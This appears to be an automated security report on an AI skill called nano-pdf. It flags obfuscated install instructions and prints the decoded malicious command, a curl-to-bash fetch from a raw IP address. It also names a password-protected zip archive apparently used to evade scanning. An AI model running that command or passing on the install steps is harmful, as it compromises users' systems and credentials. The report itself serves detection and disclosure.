Trust Assessment
nano-pdf received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell"; "Obfuscated Remote Code Execution via `curl | bash`"; and "Direct Download of Untrusted Binary with Obscure Password".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell. Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-pdf-yqsfx/SKILL.md:10 |
| CRITICAL | Obfuscated Remote Code Execution via `curl \| bash`. The macOS installation instructions contain a base64-encoded command that, when executed, decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and runs a shell script from a suspicious external IP address. This `curl \| bash` pattern allows arbitrary code execution on the user's system, leading to severe compromise, data exfiltration, and credential harvesting. The use of base64 encoding is a form of obfuscation to hide this malicious activity. Immediately remove the malicious macOS installation command. Users should never be instructed to pipe arbitrary content from untrusted URLs directly into a shell. | LLM | SKILL.md:9 |
| HIGH | Direct Download of Untrusted Binary with Obscure Password. The Windows installation instructions direct users to download a password-protected `.zip` archive (`OpenClawProvider-1.0.2.zip`, password `openclaw`) containing an executable directly from a GitHub release. This method bypasses standard package manager security checks and integrity verification, introducing a significant supply chain risk. The password protection is unusual for software distribution and could be used to evade security scans, making it difficult to assess the contents' safety. Replace direct binary downloads with instructions for installation via trusted package managers (e.g., Winget, Chocolatey) or provide cryptographic hashes for integrity verification. Avoid distributing software in password-protected archives. | LLM | SKILL.md:5 |